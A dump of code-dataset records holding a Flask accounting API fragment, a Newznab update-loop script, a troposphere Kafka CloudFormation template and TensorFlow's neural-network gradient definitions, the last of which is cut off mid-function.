# db.accounting does its own logging, so these endpoints don't
@api_route('/api/log_erroneous_sale', methods=['POST'])
@login_required
@deserialize(ErroneousSaleLoadSchema)
def accept_erroneous_sale(data):
db.accounting.log_erroneous_sale(data['amount'], get_user(), data['cash_box'])
sqla.session.commit()
return {}
class DepositReturnSchema(IdSchema):
cash_box = CashBoxField()
document_id = fields.Int()
@api_route('/api/log_deposit_return', methods=['POST'])
@login_required
@deserialize(DepositReturnSchema)
def log_deposit_return(data):
if 'document_id' in data:
doc = Document.query.get(data['document_id'])
# data privacy, yo
doc.submitted_by = None
dep = Deposit.query.get(data['id'])
if Deposit.query.filter(Deposit.id == data['id']).delete() == 0:
raise ClientError('deposit not found')
db.accounting.log_deposit_return(dep, get_user(), data['cash_box'])
sqla.session.commit()
return {}
class DonationLoadSchema(Schema):
amount = fields.Int(required=True, validate=lambda i: i != 0)
cash_box = CashBoxField()
@api_route('/api/donation', methods=['POST'])
@login_required
@deserialize(DonationLoadSchema)
def log_donation(data):
db.accounting.log_donation(get_user(), data['amount'], data['cash_box'])
sqla.session.commit()
return {}
| mit | -1,078,629,200,508,396,400 | 27.33871 | 82 | 0.705748 | false |
anth0/nnplus | misc/update_scripts/update.py | 1 | 1977 | #!/usr/bin/env python
# Author: Nic Wolfe <[email protected]>
# URL: http://www.newznab.com/
#
# This file is part of Newznab
#
# Newznab is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Newznab is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Newznab. If not, see <http://www.gnu.org/licenses/>.
NEWZNAB_PATH = "/usr/local/www/newznab/misc/update_scripts"
NEWZNAB_RUN_TIME = 600 # in seconds
update_scripts = ["update_binaries.php", "update_releases.php"]
import datetime
import os
import subprocess
import time
last_execution = datetime.datetime.today()
last_optimise = None
# just do this forever
while True:
# run all our scripts
for cur_script in update_scripts:
cmd = ["php", cur_script]
subprocess.call(cmd, cwd=NEWZNAB_PATH)
# if it's time to optimise then do it
if datetime.datetime.today().hour in (3,15):
if not last_optimise or datetime.datetime.today() - last_optimise > datetime.timedelta(hours=2):
print 'Optimizing database...'
subprocess.call(["php", "optimise_db.php"], cwd=NEWZNAB_PATH)
last_optimise = datetime.datetime.today()
cur_finish_time = datetime.datetime.today()
run_duration = cur_finish_time - last_execution
# if we need to sleep then do it, but only sleep the remainder
if run_duration.seconds < NEWZNAB_RUN_TIME:
sleep_duration = NEWZNAB_RUN_TIME - run_duration.seconds
print 'Sleeping for', sleep_duration, 'seconds'
time.sleep(sleep_duration)
else:
print 'Last run took too long, starting immediately'
last_execution = datetime.datetime.today()
| gpl-3.0 | -7,422,745,014,853,515,000 | 32.508475 | 98 | 0.738493 | false |
balanced-ops/infra-kafka | formation/kafka.py | 1 | 1410 | #!/usr/bin/env python
from confu import atlas
from troposphere import (
Template, FindInMap, GetAtt, Ref, Parameter, Join, Base64, Select, Output,
ec2 as ec2
)
template = Template()
template.add_description('kafka')
atlas.infra_params(template) # ssh_key, Env, Silo
atlas.conf_params(template) # Conf Name, Conf Version, Conf tarball bucket
atlas.instance_params(
template,
roles_default=['kafka', ],
iam_default='kafka',
)
atlas.scaling_params(template)
atlas.mappings(
template,
accounts=[atlas.poundpay],
)
kafka_secgrp = atlas.instance_secgrp(
template,
name="Kafka",
SecurityGroupIngress=[
ec2.SecurityGroupRule(
'Consumers',
IpProtocol='tcp',
FromPort='6667',
ToPort='6667',
CidrIp=atlas.vpc_cidr, #TODO: open 6667 for consumers only.
),
]
)
i_meta_data = {}
atlas.cfn_auth_metadata(i_meta_data)
atlas.cfn_init_metadata(i_meta_data)
i_launchconf = atlas.instance_launchconf(
template,
"KAFKA",
Metadata=i_meta_data,
SecurityGroups=[Ref(kafka_secgrp)],
)
scaling_group = atlas.instance_scalegrp(
template,
'Kafka',
LaunchConfigurationName=Ref(i_launchconf),
MinSize=Ref('MinSize'),
MaxSize=Ref('MaxSize'),
DesiredCapacity=Ref('DesiredCapacity'),
)
if __name__ == '__main__':
print template.to_json(indent=4, sort_keys=True)
| mit | 3,653,141,776,570,159,000 | 20.692308 | 78 | 0.653191 | false |
Intel-Corporation/tensorflow | tensorflow/python/ops/nn_grad.py | 1 | 37589 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in nn_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
@ops.RegisterGradient("Conv2DBackpropInput")
def _Conv2DBackpropInputGrad(op, grad):
"""The derivatives for deconvolution.
Args:
op: the Deconvolution op.
grad: the tensor representing the gradient w.r.t. the output
Returns:
the gradients w.r.t. the input and the filter
"""
return [
None,
nn_ops.conv2d_backprop_filter(
grad,
array_ops.shape(op.inputs[1]),
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode()),
nn_ops.conv2d(
grad,
op.inputs[1],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode())
]
@ops.RegisterGradient("Conv2DBackpropFilter")
def _Conv2DBackpropFilterGrad(op, grad):
return [
nn_ops.conv2d_backprop_input(
array_ops.shape(op.inputs[0]),
grad,
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode()), None,
nn_ops.conv2d(
op.inputs[0],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
use_cudnn_on_gpu=op.get_attr("use_cudnn_on_gpu"),
data_format=op.get_attr("data_format").decode())
]
@ops.RegisterGradient("DepthwiseConv2dNativeBackpropInput")
def _DepthwiseConv2dNativeBackpropInputGrad(op, grad):
"""The derivatives for deconvolution.
Args:
op: the Deconvolution op.
grad: the tensor representing the gradient w.r.t. the output
Returns:
the gradients w.r.t. the input and the filter
"""
return [
None,
nn_ops.depthwise_conv2d_native_backprop_filter(
grad,
array_ops.shape(op.inputs[1]),
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")),
nn_ops.depthwise_conv2d_native(
grad,
op.inputs[1],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format"))
]
@ops.RegisterGradient("DepthwiseConv2dNativeBackpropFilter")
def _DepthwiseConv2dNativeBackpropFilterGrad(op, grad):
return [
nn_ops.depthwise_conv2d_native_backprop_input(
array_ops.shape(op.inputs[0]),
grad,
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")), None,
nn_ops.depthwise_conv2d_native(
op.inputs[0],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format"))
]
@ops.RegisterGradient("Conv3D")
def _Conv3DGrad(op, grad):
data_format = op.get_attr("data_format").decode()
return [
nn_ops.conv3d_backprop_input_v2(
array_ops.shape(op.inputs[0]),
op.inputs[1],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format),
nn_ops.conv3d_backprop_filter_v2(
op.inputs[0],
array_ops.shape(op.inputs[1]),
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format)
]
@ops.RegisterGradient("Conv3DBackpropInputV2")
def _Conv3DBackpropInputGrad(op, grad):
data_format = op.get_attr("data_format").decode()
return [
None,
nn_ops.conv3d_backprop_filter_v2(
grad,
array_ops.shape(op.inputs[1]),
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format),
nn_ops.conv3d(
grad,
op.inputs[1],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format)
]
@ops.RegisterGradient("Conv3DBackpropFilterV2")
def _Conv3DBackpropFilterGrad(op, grad):
data_format = op.get_attr("data_format").decode()
return [
nn_ops.conv3d_backprop_input_v2(
array_ops.shape(op.inputs[0]),
grad,
op.inputs[2],
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format), None,
nn_ops.conv3d(
op.inputs[0],
grad,
dilations=op.get_attr("dilations"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=data_format)
]
@ops.RegisterGradient("AvgPool3D")
def _AvgPool3DGrad(op, grad):
return gen_nn_ops.avg_pool3d_grad(
array_ops.shape(op.inputs[0]),
grad,
ksize=op.get_attr("ksize"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode())
@ops.RegisterGradient("AvgPool3DGrad")
def _AvgPool3DGradGrad(op, grad):
return (array_ops.stop_gradient(op.inputs[0]),
gen_nn_ops.avg_pool3d(
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format").decode()))
@ops.RegisterGradient("MaxPool3D")
def _MaxPool3DGrad(op, grad):
return gen_nn_ops.max_pool3d_grad(
op.inputs[0],
op.outputs[0],
grad,
ksize=op.get_attr("ksize"),
strides=op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode())
@ops.RegisterGradient("MaxPool3DGrad")
def _MaxPool3DGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool3d_grad_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode()))
@ops.RegisterGradient("MaxPool3DGradGrad")
def _MaxPool3DGradGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool3d_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format").decode()))
@ops.RegisterGradient("Softmax")
def _SoftmaxGrad(op, grad_softmax):
"""The derivative of the softmax nonlinearity.
We assume that probs is of shape [batch_size * dim]
The formula for dsoftmax / dx = (diag(softmax) - softmax * softmax').
This matrix is diagonal minus a rank one matrix, so it is easy to implement
as follows:
grad_x = grad_softmax * softmax - sum(grad_softmax * softmax) * softmax
Args:
op: the Softmax op.
grad_softmax: the tensor representing the gradient w.r.t. the softmax
output.
Returns:
gradient w.r.t the input to the softmax
"""
softmax = op.outputs[0]
sum_channels = math_ops.reduce_sum(grad_softmax * softmax, -1, keepdims=True)
return (grad_softmax - sum_channels) * softmax
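# --- Editor's numeric check (not part of the original module) ---
# Verifies the closed form used in _SoftmaxGrad above,
#   grad_x = (grad_softmax - sum(grad_softmax * softmax, -1)) * softmax,
# against the explicit Jacobian-vector product with dsoftmax/dx = diag(s) - s s^T.
# Pure NumPy; nothing TensorFlow-specific is assumed.  Run it manually if desired.
def _check_softmax_grad_formula():
  import numpy as np
  rng = np.random.RandomState(0)
  x = rng.randn(4)
  s = np.exp(x) / np.sum(np.exp(x))        # softmax(x)
  g = rng.randn(4)                         # incoming gradient w.r.t. softmax output
  jacobian = np.diag(s) - np.outer(s, s)   # dsoftmax/dx
  expected = jacobian.T.dot(g)             # vector-Jacobian product
  got = (g - np.sum(g * s)) * s            # formula implemented above
  assert np.allclose(expected, got)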
@ops.RegisterGradient("LogSoftmax")
def _LogSoftmaxGrad(op, grad):
"""The gradient for log_softmax.
  log_softmax = input - log(sum(exp(input)))
dlog_softmax/dinput = diag - softmax(input)
Args:
op: The log softmax op.
grad: The tensor representing the gradient w.r.t. the output.
Returns:
The gradients w.r.t. the input.
"""
softmax = math_ops.exp(op.outputs[0])
return grad - math_ops.reduce_sum(grad, -1, keepdims=True) * softmax
@ops.RegisterGradient("BiasAdd")
def _BiasAddGrad(op, received_grad):
"""Return the gradients for the 2 inputs of bias_op.
  The first input of the bias op is the tensor t, and its gradient is
  just the gradient the op received.
  The second input of the bias op is the bias vector, which has one fewer
  dimension than "received_grad" (the batch dimension). Its gradient is the
  received gradient summed on the batch dimension, which is the first dimension.
Args:
op: The BiasOp for which we need to generate gradients.
received_grad: Tensor. The gradients passed to the BiasOp.
Returns:
Two tensors, the first one for the "tensor" input of the BiasOp,
the second one for the "bias" input of the BiasOp.
"""
try:
data_format = op.get_attr("data_format")
except ValueError:
data_format = None
return (received_grad,
gen_nn_ops.bias_add_grad(
out_backprop=received_grad, data_format=data_format))
@ops.RegisterGradient("BiasAddGrad")
def _BiasAddGradGrad(op, received_grad):
"""Gradient for the BiasAddGrad op.
Args:
op: BiasAddGrad op for which we are calculating gradients.
received_grad: The gradients passed to the BiasAddGrad op.
Returns:
A single gradient Tensor for the input to BiasAddGrad (which
is the gradient of the bias term in BiasAdd)
"""
try:
data_format = op.get_attr("data_format")
except ValueError:
data_format = None
shape = array_ops.shape(op.inputs[0])
bias_shape = array_ops.shape(received_grad)
if data_format == b"NCHW":
expanded_shape = array_ops.concat([
array_ops.ones_like(shape[:1]), bias_shape,
array_ops.ones_like(shape[2:])
], 0)
tile_mults = array_ops.concat([shape[:1], [1], shape[2:]], 0)
else:
expanded_shape = array_ops.concat(
[array_ops.ones_like(shape[:-1]), bias_shape], 0)
tile_mults = array_ops.concat([shape[:-1], [1]], 0)
expanded_grad = array_ops.reshape(received_grad, expanded_shape)
return array_ops.tile(expanded_grad, tile_mults)
@ops.RegisterGradient("BiasAddV1")
def _BiasAddGradV1(unused_bias_op, received_grad):
"""Return the gradients for the 2 inputs of bias_op.
The first input of unused_bias_op is the tensor t, and its gradient is
just the gradient the unused_bias_op received.
The second input of unused_bias_op is the bias vector which has one fewer
dimension than "received_grad" (the batch dimension.) Its gradient is the
  received gradient summed on the batch dimension, which is the first dimension.
Args:
unused_bias_op: The BiasOp for which we need to generate gradients.
received_grad: Tensor. The gradients passed to the BiasOp.
Returns:
Two tensors, the first one for the "tensor" input of the BiasOp,
the second one for the "bias" input of the BiasOp.
"""
reduction_dim_tensor = math_ops.range(array_ops.rank(received_grad) - 1)
return (received_grad, math_ops.reduce_sum(received_grad,
reduction_dim_tensor))
@ops.RegisterGradient("Relu")
def _ReluGrad(op, grad):
return gen_nn_ops.relu_grad(grad, op.outputs[0])
@ops.RegisterGradient("EluGrad")
def _EluGradGrad(op, grad):
elu_x = op.inputs[1]
return (gen_nn_ops.elu_grad(grad, op.outputs[0]),
array_ops.where(
elu_x < 0, grad * op.inputs[0],
array_ops.zeros(shape=array_ops.shape(elu_x), dtype=elu_x.dtype)))
@ops.RegisterGradient("SeluGrad")
def _SeluGradGrad(op, grad):
x = op.inputs[1]
scale_alpha = 1.7580993408473768599402175208123
return (gen_nn_ops.elu_grad(grad, op.outputs[0]),
array_ops.where(
x < 0., gen_nn_ops.elu_grad(grad, op.outputs[0] + scale_alpha),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype)))
@ops.RegisterGradient("Relu6")
def _Relu6Grad(op, grad):
return gen_nn_ops.relu6_grad(grad, op.outputs[0])
@ops.RegisterGradient("Relu6Grad")
def _Relu6GradGrad(op, grad):
x = op.inputs[1]
return (gen_nn_ops.relu6_grad(grad, x),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype))
@ops.RegisterGradient("LeakyRelu")
def _LeakyReluGrad(op, grad):
x = op.inputs[0]
alpha = op.get_attr("alpha")
return gen_nn_ops.leaky_relu_grad(grad, x, alpha=alpha)
@ops.RegisterGradient("LeakyReluGrad")
def _LeakyReluGradGrad(op, grad):
x = op.inputs[1]
alpha = op.get_attr("alpha")
return (gen_nn_ops.leaky_relu_grad(grad, x, alpha=alpha),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype))
@ops.RegisterGradient("Elu")
def _EluGrad(op, grad):
return gen_nn_ops.elu_grad(grad, op.outputs[0])
@ops.RegisterGradient("Selu")
def _SeluGrad(op, grad):
return gen_nn_ops.selu_grad(grad, op.outputs[0])
@ops.RegisterGradient("Softplus")
def _SoftplusGrad(op, grad):
return grad * math_ops.sigmoid(op.inputs[0])
@ops.RegisterGradient("SoftplusGrad")
def _SoftplusGradGrad(op, grad):
# Let:
# y = tf.nn.softplus(x)
# dx = gen_nn_ops.softplus_grad(dy, x) = dy / (1 + exp(-x))
# This op computes (ddy, d2x) from op.inputs == [dy, x] and grad == ddx.
dy, x = op.inputs
with ops.control_dependencies([grad]):
ddy = gen_nn_ops.softplus_grad(grad, x)
d2x = grad * dy / (math_ops.exp(-x) + 2.0 + math_ops.exp(x))
return (ddy, d2x)
@ops.RegisterGradient("Softsign")
def _SoftsignGrad(op, grad):
return gen_nn_ops.softsign_grad(grad, op.inputs[0])
@ops.RegisterGradient("ReluGrad")
def _ReluGradGrad(op, grad):
x = op.inputs[1]
return (gen_nn_ops.relu_grad(grad, x),
array_ops.zeros(shape=array_ops.shape(x), dtype=x.dtype))
def _BroadcastMul(vec, mat):
"""Multiply after broadcasting vec to match dimensions of mat.
Args:
vec: A 1-D tensor of dimension [D0]
mat: A 2-D tensor of dimension [D0, D1]
Returns:
A tensor of dimension [D0, D1], the result of vec * mat
"""
# Reshape vec to [D0, 1]
vec = array_ops.expand_dims(vec, -1)
return vec * mat
@ops.RegisterGradient("SoftmaxCrossEntropyWithLogits")
def _SoftmaxCrossEntropyWithLogitsGrad(op, grad_loss, grad_grad):
"""Gradient function for SoftmaxCrossEntropyWithLogits."""
# grad_loss is the backprop for cost, and we multiply it with the gradients
# (which is output[1])
# grad_grad is the backprop for softmax gradient.
#
# Second derivative is just softmax derivative w.r.t. logits.
softmax_grad = op.outputs[1]
grad = _BroadcastMul(grad_loss, softmax_grad)
def IsZero(g):
# Some introspection to check if the gradient is feeding zeros
if context.executing_eagerly():
# TODO(apassos) add an efficient way to detect eager zeros here.
return False
if g.op.type in ("ZerosLike", "Zeros"):
return True
const_fill_value = tensor_util.constant_value(g)
return const_fill_value is not None and (const_fill_value == 0).all()
logits = op.inputs[0]
if grad_grad is not None and not IsZero(grad_grad):
softmax = nn_ops.softmax(logits)
grad += ((grad_grad - array_ops.squeeze(
math_ops.matmul(
array_ops.expand_dims(grad_grad, 1),
array_ops.expand_dims(softmax, 2)),
axis=1)) * softmax)
return grad, _BroadcastMul(grad_loss, -nn_ops.log_softmax(logits))
@ops.RegisterGradient("SparseSoftmaxCrossEntropyWithLogits")
def _SparseSoftmaxCrossEntropyWithLogitsGrad(op, grad_0, _):
"""Gradient function for SparseSoftmaxCrossEntropyWithLogits."""
# grad_0 is the backprop for cost, and we multiply it with the gradients
# (which is output[1])
# There is no gradient for the labels
#
# Currently there is no way to take the second derivative of this op
# due to the fused implementation's interaction with tf.gradients(),
# so we make sure we prevent silently incorrect results by raising
# an error if the second derivative is requested via prevent_gradient.
sparse_softmax_grad_without_gradient = array_ops.prevent_gradient(
op.outputs[1],
message="Currently there is no way to take the second "
"derivative of sparse_softmax_cross_entropy_with_logits due to the fused "
"implementation's interaction with tf.gradients()")
return _BroadcastMul(grad_0, sparse_softmax_grad_without_gradient), None
@ops.RegisterGradient("Conv2D")
def _Conv2DGrad(op, grad):
"""Gradient function for Conv2D."""
dilations = op.get_attr("dilations")
strides = op.get_attr("strides")
padding = op.get_attr("padding")
explicit_paddings = op.get_attr("explicit_paddings")
use_cudnn_on_gpu = op.get_attr("use_cudnn_on_gpu")
data_format = op.get_attr("data_format")
shape_0, shape_1 = array_ops.shape_n([op.inputs[0], op.inputs[1]])
# We call the gen_nn_ops backprop functions instead of nn_ops backprop
# functions for performance reasons in Eager mode. gen_nn_ops functions take a
  # `explicit_paddings` parameter, but nn_ops functions do not. So if we were
# to use the nn_ops functions, we would have to convert `padding` and
# `explicit_paddings` into a single `padding` parameter, increasing overhead
# in Eager mode.
return [
gen_nn_ops.conv2d_backprop_input(
shape_0,
op.inputs[1],
grad,
dilations=dilations,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format),
gen_nn_ops.conv2d_backprop_filter(
op.inputs[0],
shape_1,
grad,
dilations=dilations,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format)
]
@ops.RegisterGradient("DepthwiseConv2dNative")
def _DepthwiseConv2dNativeGrad(op, grad):
return [
nn_ops.depthwise_conv2d_native_backprop_input(
array_ops.shape(op.inputs[0]),
op.inputs[1],
grad,
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format")),
nn_ops.depthwise_conv2d_native_backprop_filter(
op.inputs[0],
array_ops.shape(op.inputs[1]),
grad,
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format"))
]
@ops.RegisterGradient("Dilation2D")
def _Dilation2DGrad(op, grad):
return [
nn_ops.dilation2d_backprop_input(op.inputs[0], op.inputs[1], grad,
op.get_attr("strides"),
op.get_attr("rates"),
op.get_attr("padding")),
nn_ops.dilation2d_backprop_filter(op.inputs[0], op.inputs[1], grad,
op.get_attr("strides"),
op.get_attr("rates"),
op.get_attr("padding"))
]
@ops.RegisterGradient("LRN")
def _LRNGrad(op, grad):
depth_radius = op.get_attr("depth_radius")
bias = op.get_attr("bias")
alpha = op.get_attr("alpha")
beta = op.get_attr("beta")
return [
gen_nn_ops.lrn_grad(grad, op.inputs[0], op.outputs[0], depth_radius, bias,
alpha, beta)
]
@ops.RegisterGradient("AvgPool")
def _AvgPoolGrad(op, grad):
return gen_nn_ops.avg_pool_grad(
array_ops.shape(op.inputs[0]),
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format"))
@ops.RegisterGradient("AvgPoolGrad")
def _AvgPoolGradGrad(op, grad):
return (array_ops.stop_gradient(op.inputs[0]),
gen_nn_ops.avg_pool(
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
op.get_attr("padding"),
data_format=op.get_attr("data_format")))
@ops.RegisterGradient("MaxPool")
def _MaxPoolGrad(op, grad):
return gen_nn_ops.max_pool_grad(
op.inputs[0],
op.outputs[0],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format"))
@ops.RegisterGradient("MaxPoolV2")
def _MaxPoolGradV2(op, grad):
ksize = op.inputs[1]
strides = op.inputs[2]
return gen_nn_ops.max_pool_grad_v2(
op.inputs[0],
op.outputs[0],
grad,
ksize,
strides,
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")), None, None
@ops.RegisterGradient("MaxPoolWithArgmax")
def _MaxPoolGradWithArgmax(op, grad, unused_argmax_grad):
del unused_argmax_grad
return gen_nn_ops.max_pool_grad_with_argmax(
op.inputs[0],
grad,
op.outputs[1],
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
include_batch_in_index=op.get_attr("include_batch_in_index"))
@ops.RegisterGradient("MaxPoolGrad")
def _MaxPoolGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool_grad_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")))
@ops.RegisterGradient("MaxPoolGradV2")
def _MaxPoolGradGradV2(op, grad):
ksize = op.inputs[3]
strides = op.inputs[4]
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool_grad_grad_v2(
op.inputs[0],
op.inputs[1],
grad,
ksize,
strides,
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")), None, None)
@ops.RegisterGradient("MaxPoolGradGrad")
def _MaxPoolGradGradGrad(op, grad):
return (array_ops.zeros(
shape=array_ops.shape(op.inputs[0]), dtype=op.inputs[0].dtype),
array_ops.zeros(
shape=array_ops.shape(op.inputs[1]), dtype=op.inputs[1].dtype),
gen_nn_ops.max_pool_grad(
op.inputs[0],
op.inputs[1],
grad,
op.get_attr("ksize"),
op.get_attr("strides"),
padding=op.get_attr("padding"),
data_format=op.get_attr("data_format")))
@ops.RegisterGradient("FractionalMaxPool")
def _FractionalMaxPoolGrad(op, grad_0, unused_grad_1, unused_grad_2):
"""Returns gradient for FractionalMaxPool.
Since FractionalMaxPool has three outputs, there are three gradients passed in
for each of the outputs. Only the first one is useful, the other two gradients
are empty.
Args:
op: The FractionalMaxPoolOp.
grad_0: Gradient with respect to op.outputs[0]
unused_grad_1: Gradient with respect to op.outputs[1]/row_seq. It is empty.
unused_grad_2: Gradient with respect to op.outputs[2]/col_seq. It is empty.
Returns:
Input backprop for FractionalMaxPool op.
"""
return gen_nn_ops.fractional_max_pool_grad(
op.inputs[0], op.outputs[0], grad_0, op.outputs[1], op.outputs[2],
op.get_attr("overlapping"))
@ops.RegisterGradient("FractionalAvgPool")
def _FractionalAvgPoolGrad(op, grad_0, unused_grad_1, unused_grad_2):
"""Returns gradient for FractionalAvgPool.
Since FractionalAvgPool has three outputs, there are three gradients passed in
for each of the outputs. Only the first one is useful, the other two gradients
are empty.
Args:
op: The FractionalAvgPoolOp.
grad_0: Gradient with respect to op.outputs[0]
unused_grad_1: Gradient with respect to op.outputs[1]/row_seq. It is empty.
unused_grad_2: Gradient with respect to op.outputs[2]/col_seq. It is empty.
Returns:
Input backprop for FractionalAvgPool op.
"""
return gen_nn_ops.fractional_avg_pool_grad(op.inputs[0].get_shape(), grad_0,
op.outputs[1], op.outputs[2],
op.get_attr("overlapping"))
@ops.RegisterGradient("BatchNormWithGlobalNormalization")
def _BatchNormWithGlobalNormalizationGrad(op, grad):
"""Return the gradients for the 5 inputs of BatchNormWithGlobalNormalization.
We do not backprop anything for the mean and var intentionally as they are
not being trained with backprop in the operation.
Args:
op: The BatchNormOp for which we need to generate gradients.
grad: Tensor. The gradients passed to the BatchNormOp.
Returns:
dx: Backprop for input, which is (grad * (g * rsqrt(v + epsilon)))
dm: Backprop for mean, which is
sum_over_rest(grad * g) * (-1 / rsqrt(v + epsilon))
dv: Backprop for variance, which is
sum_over_rest(grad * g * (x - m)) * (-1/2) * (v + epsilon) ^ (-3/2)
db: Backprop for beta, which is grad reduced in all except the
last dimension.
dg: Backprop for gamma, which is (grad * ((x - m) * rsqrt(v + epsilon)))
"""
dx, dm, dv, db, dg = gen_nn_ops.batch_norm_with_global_normalization_grad(
op.inputs[0], op.inputs[1], op.inputs[2], op.inputs[4], grad,
op.get_attr("variance_epsilon"), op.get_attr("scale_after_normalization"))
return dx, dm, dv, db, dg
def _BaseFusedBatchNormGrad(op, use_v2, *grad):
"""Return the gradients for the 3 inputs of BatchNorm.
Args:
op: The BatchNormOp for which we need to compute gradients.
use_v2: Boolean indicating whether to use the V2 version of the fused batch
norm gradient.
*grad: An argument list for tensors of gradients wrt the outputs with
grad[0] as grad_y.
Returns:
grad_x: gradient for x, which is scale * rsqrt(variance + epsilon) *
[grad_y - mean(grad_y) - (x - mean(x)) *
mean(grad_y * (x - mean(x))) / (variance + epsilon)]
in training mode; grad_y * scale * rsqrt(pop_variance + epsilon)
in freeze mode.
grad_scale: gradient for scale, which is sum(grad_y * (x - mean(x)) *
rsqrt(variance + epsilon)) in training mode;
sum(grad_y * (x - pop_mean) * rsqrt(pop_variance + epsilon))
in freeze mode.
grad_offset: gradient for offset, which is sum(grad_y) in training mode;
sum(grad_y) in freeze mode.
"""
x = op.inputs[0]
grad_y = grad[0]
scale = op.inputs[1]
epsilon = op.get_attr("epsilon")
data_format = op.get_attr("data_format")
is_training = op.get_attr("is_training")
grad_fun = (
gen_nn_ops.fused_batch_norm_grad_v2
if use_v2 else gen_nn_ops.fused_batch_norm_grad)
if is_training:
return grad_fun(
grad_y,
x,
scale,
op.outputs[3],
op.outputs[4],
epsilon=epsilon,
data_format=data_format,
is_training=is_training)
else:
pop_mean = op.inputs[3]
